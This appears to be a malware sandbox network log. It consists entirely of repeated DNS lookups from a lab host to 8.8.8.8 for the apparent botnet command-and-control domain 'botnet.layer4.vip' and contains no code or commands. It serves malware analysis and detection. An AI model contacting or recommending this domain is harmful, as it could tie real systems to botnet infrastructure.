                                  Apr 9, 2023 03:31:55.323668003 CEST192.168.2.238.8.8.80xa0a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.347702026 CEST192.168.2.238.8.8.80xa0a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.371929884 CEST192.168.2.238.8.8.80xa0a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.387495041 CEST192.168.2.238.8.8.80xa0a2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.411833048 CEST192.168.2.238.8.8.80x43e8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.427747965 CEST192.168.2.238.8.8.80x43e8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.451961040 CEST192.168.2.238.8.8.80x43e8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.467658997 CEST192.168.2.238.8.8.80x43e8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.483591080 CEST192.168.2.238.8.8.80x43e8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.508111954 CEST192.168.2.238.8.8.80x6e7fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.532146931 CEST192.168.2.238.8.8.80x6e7fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.556279898 CEST192.168.2.238.8.8.80x6e7fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.572196960 CEST192.168.2.238.8.8.80x6e7fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.587773085 CEST192.168.2.238.8.8.80x6e7fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.603665113 CEST192.168.2.238.8.8.80x17d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.619311094 CEST192.168.2.238.8.8.80x17d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.635296106 CEST192.168.2.238.8.8.80x17d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.650759935 CEST192.168.2.238.8.8.80x17d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.674987078 CEST192.168.2.238.8.8.80x17d0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.699157953 CEST192.168.2.238.8.8.80x9ca9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.723632097 CEST192.168.2.238.8.8.80x9ca9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.747770071 CEST192.168.2.238.8.8.80x9ca9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.772228003 CEST192.168.2.238.8.8.80x9ca9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.788157940 CEST192.168.2.238.8.8.80x9ca9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.803740025 CEST192.168.2.238.8.8.80x5d5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.819674015 CEST192.168.2.238.8.8.80x5d5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.835202932 CEST192.168.2.238.8.8.80x5d5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.850977898 CEST192.168.2.238.8.8.80x5d5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.875499964 CEST192.168.2.238.8.8.80x5d5bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.899740934 CEST192.168.2.238.8.8.80x2e87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.916222095 CEST192.168.2.238.8.8.80x2e87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.940609932 CEST192.168.2.238.8.8.80x2e87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.964709997 CEST192.168.2.238.8.8.80x2e87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.989144087 CEST192.168.2.238.8.8.80x2e87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.004755974 CEST192.168.2.238.8.8.80x947bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.029201031 CEST192.168.2.238.8.8.80x947bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.044820070 CEST192.168.2.238.8.8.80x947bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.068881035 CEST192.168.2.238.8.8.80x947bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.092962980 CEST192.168.2.238.8.8.80x947bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.108839989 CEST192.168.2.238.8.8.80x2845Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.124422073 CEST192.168.2.238.8.8.80x2845Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.148523092 CEST192.168.2.238.8.8.80x2845Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.165173054 CEST192.168.2.238.8.8.80x2845Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.189302921 CEST192.168.2.238.8.8.80x2845Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.213773966 CEST192.168.2.238.8.8.80x43b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.229680061 CEST192.168.2.238.8.8.80x43b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.245153904 CEST192.168.2.238.8.8.80x43b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.269700050 CEST192.168.2.238.8.8.80x43b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.285204887 CEST192.168.2.238.8.8.80x43b2Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.309365988 CEST192.168.2.238.8.8.80x872cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.324919939 CEST192.168.2.238.8.8.80x872cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.343059063 CEST192.168.2.238.8.8.80x872cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.358778954 CEST192.168.2.238.8.8.80x872cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.383239985 CEST192.168.2.238.8.8.80x872cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.399303913 CEST192.168.2.238.8.8.80x6da3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.423896074 CEST192.168.2.238.8.8.80x6da3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.448035955 CEST192.168.2.238.8.8.80x6da3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.472522020 CEST192.168.2.238.8.8.80x6da3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.488365889 CEST192.168.2.238.8.8.80x6da3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.512630939 CEST192.168.2.238.8.8.80x8fe5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.536792994 CEST192.168.2.238.8.8.80x8fe5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.552337885 CEST192.168.2.238.8.8.80x8fe5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.576347113 CEST192.168.2.238.8.8.80x8fe5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.600656033 CEST192.168.2.238.8.8.80x8fe5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.624833107 CEST192.168.2.238.8.8.80xfe63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.640613079 CEST192.168.2.238.8.8.80xfe63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.656681061 CEST192.168.2.238.8.8.80xfe63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.681127071 CEST192.168.2.238.8.8.80xfe63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.696954966 CEST192.168.2.238.8.8.80xfe63Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.712668896 CEST192.168.2.238.8.8.80x709fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.728523016 CEST192.168.2.238.8.8.80x709fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.744345903 CEST192.168.2.238.8.8.80x709fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.760174990 CEST192.168.2.238.8.8.80x709fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.784398079 CEST192.168.2.238.8.8.80x709fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.808574915 CEST192.168.2.238.8.8.80x18f9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.824508905 CEST192.168.2.238.8.8.80x18f9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.848642111 CEST192.168.2.238.8.8.80x18f9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.864167929 CEST192.168.2.238.8.8.80x18f9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.880017996 CEST192.168.2.238.8.8.80x18f9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.895946980 CEST192.168.2.238.8.8.80x5599Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.911449909 CEST192.168.2.238.8.8.80x5599Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.926965952 CEST192.168.2.238.8.8.80x5599Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.942543030 CEST192.168.2.238.8.8.80x5599Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.966686010 CEST192.168.2.238.8.8.80x5599Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.982321978 CEST192.168.2.238.8.8.80xdb48Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.998109102 CEST192.168.2.238.8.8.80xdb48Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.022496939 CEST192.168.2.238.8.8.80xdb48Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.046878099 CEST192.168.2.238.8.8.80xdb48Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.062742949 CEST192.168.2.238.8.8.80xdb48Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.086905003 CEST192.168.2.238.8.8.80xb127Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.111375093 CEST192.168.2.238.8.8.80xb127Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.135727882 CEST192.168.2.238.8.8.80xb127Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.160069942 CEST192.168.2.238.8.8.80xb127Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.184499979 CEST192.168.2.238.8.8.80xb127Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.208947897 CEST192.168.2.238.8.8.80x78c1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.233335018 CEST192.168.2.238.8.8.80x78c1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.248817921 CEST192.168.2.238.8.8.80x78c1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.264349937 CEST192.168.2.238.8.8.80x78c1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.288743973 CEST192.168.2.238.8.8.80x78c1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.304275990 CEST192.168.2.238.8.8.80xa98dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.320091963 CEST192.168.2.238.8.8.80xa98dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.344156027 CEST192.168.2.238.8.8.80xa98dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.360073090 CEST192.168.2.238.8.8.80xa98dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.384339094 CEST192.168.2.238.8.8.80xa98dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.400383949 CEST192.168.2.238.8.8.80x5b74Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.424918890 CEST192.168.2.238.8.8.80x5b74Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.449248075 CEST192.168.2.238.8.8.80x5b74Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.473885059 CEST192.168.2.238.8.8.80x5b74Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.489517927 CEST192.168.2.238.8.8.80x5b74Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.505199909 CEST192.168.2.238.8.8.80xa3deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.520991087 CEST192.168.2.238.8.8.80xa3deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.545516014 CEST192.168.2.238.8.8.80xa3deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.561120033 CEST192.168.2.238.8.8.80xa3deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.585769892 CEST192.168.2.238.8.8.80xa3deStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.610219002 CEST192.168.2.238.8.8.80xac39Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.634380102 CEST192.168.2.238.8.8.80xac39Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.658848047 CEST192.168.2.238.8.8.80xac39Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.674478054 CEST192.168.2.238.8.8.80xac39Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.690115929 CEST192.168.2.238.8.8.80xac39Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.714400053 CEST192.168.2.238.8.8.80x1439Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.738940001 CEST192.168.2.238.8.8.80x1439Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.754440069 CEST192.168.2.238.8.8.80x1439Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.769992113 CEST192.168.2.238.8.8.80x1439Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.785918951 CEST192.168.2.238.8.8.80x1439Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.810347080 CEST192.168.2.238.8.8.80x961Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.834707022 CEST192.168.2.238.8.8.80x961Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.850603104 CEST192.168.2.238.8.8.80x961Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.874677896 CEST192.168.2.238.8.8.80x961Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.899317980 CEST192.168.2.238.8.8.80x961Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.915020943 CEST192.168.2.238.8.8.80xf62dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.930912971 CEST192.168.2.238.8.8.80xf62dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.955945015 CEST192.168.2.238.8.8.80xf62dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.971519947 CEST192.168.2.238.8.8.80xf62dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.987154007 CEST192.168.2.238.8.8.80xf62dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.003185987 CEST192.168.2.238.8.8.80xf0ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.027285099 CEST192.168.2.238.8.8.80xf0ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.042922974 CEST192.168.2.238.8.8.80xf0ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.058526993 CEST192.168.2.238.8.8.80xf0ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.074455976 CEST192.168.2.238.8.8.80xf0ebStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.090399981 CEST192.168.2.238.8.8.80x9835Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.106343985 CEST192.168.2.238.8.8.80x9835Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.131330013 CEST192.168.2.238.8.8.80x9835Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.155841112 CEST192.168.2.238.8.8.80x9835Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.179997921 CEST192.168.2.238.8.8.80x9835Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.196053028 CEST192.168.2.238.8.8.80xd6e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.220541000 CEST192.168.2.238.8.8.80xd6e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.245523930 CEST192.168.2.238.8.8.80xd6e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.269974947 CEST192.168.2.238.8.8.80xd6e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.285846949 CEST192.168.2.238.8.8.80xd6e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.301712990 CEST192.168.2.238.8.8.80x782eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.326036930 CEST192.168.2.238.8.8.80x782eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.351136923 CEST192.168.2.238.8.8.80x782eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.375616074 CEST192.168.2.238.8.8.80x782eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.399799109 CEST192.168.2.238.8.8.80x782eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.427330017 CEST192.168.2.238.8.8.80xc9baStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.443969011 CEST192.168.2.238.8.8.80xc9baStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.459845066 CEST192.168.2.238.8.8.80xc9baStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.475578070 CEST192.168.2.238.8.8.80xc9baStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.500051975 CEST192.168.2.238.8.8.80xc9baStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.516088963 CEST192.168.2.238.8.8.80x29e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.540335894 CEST192.168.2.238.8.8.80x29e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.556265116 CEST192.168.2.238.8.8.80x29e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.580512047 CEST192.168.2.238.8.8.80x29e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.596066952 CEST192.168.2.238.8.8.80x29e5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.611939907 CEST192.168.2.238.8.8.80x296cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.628074884 CEST192.168.2.238.8.8.80x296cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.644030094 CEST192.168.2.238.8.8.80x296cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.668216944 CEST192.168.2.238.8.8.80x296cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.692967892 CEST192.168.2.238.8.8.80x296cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.717699051 CEST192.168.2.238.8.8.80x3254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.733881950 CEST192.168.2.238.8.8.80x3254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.758052111 CEST192.168.2.238.8.8.80x3254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.782314062 CEST192.168.2.238.8.8.80x3254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.806391954 CEST192.168.2.238.8.8.80x3254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.822937965 CEST192.168.2.238.8.8.80xec15Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.847312927 CEST192.168.2.238.8.8.80xec15Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.862924099 CEST192.168.2.238.8.8.80xec15Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.887049913 CEST192.168.2.238.8.8.80xec15Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.903793097 CEST192.168.2.238.8.8.80xec15Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.928508997 CEST192.168.2.238.8.8.80x377Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.944341898 CEST192.168.2.238.8.8.80x377Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.960263014 CEST192.168.2.238.8.8.80x377Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.976672888 CEST192.168.2.238.8.8.80x377Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.992885113 CEST192.168.2.238.8.8.80x377Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.017184973 CEST192.168.2.238.8.8.80x7f41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.032854080 CEST192.168.2.238.8.8.80x7f41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.057379961 CEST192.168.2.238.8.8.80x7f41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.082066059 CEST192.168.2.238.8.8.80x7f41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.097769976 CEST192.168.2.238.8.8.80x7f41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.114036083 CEST192.168.2.238.8.8.80x5950Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.129686117 CEST192.168.2.238.8.8.80x5950Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.154191971 CEST192.168.2.238.8.8.80x5950Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.178694010 CEST192.168.2.238.8.8.80x5950Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.194391966 CEST192.168.2.238.8.8.80x5950Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.210427999 CEST192.168.2.238.8.8.80x26aaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.234999895 CEST192.168.2.238.8.8.80x26aaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.259318113 CEST192.168.2.238.8.8.80x26aaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.283510923 CEST192.168.2.238.8.8.80x26aaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
